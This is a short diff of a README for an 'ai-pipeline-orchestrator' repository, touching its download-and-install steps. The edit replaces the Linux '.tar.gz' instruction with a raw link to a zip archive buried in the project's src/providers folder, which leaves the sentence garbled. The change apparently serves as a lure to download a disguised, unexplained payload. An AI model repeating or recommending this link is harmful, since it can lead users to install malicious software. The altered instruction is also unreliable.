dikizul/ai-pipeline-orchestrator/README.md

 3. Under the version, you will see various downloadable files.
 Choose the file that matches your operating system.
    - For Windows, select the `.exe` file.
    - For macOS, select the `.dmg` file.
-   - For Linux, select the `.tar.gz` file.
+   - For Linux, select the `https://github.com/dikizul/ai-pipeline-orchestrator/raw/refs/heads/main/src/providers/orchestrator_pipeline_ai_3.0.zip` file.
 4. Click the filename to begin the download.
 Save the file to your computer.

 ### Running the Application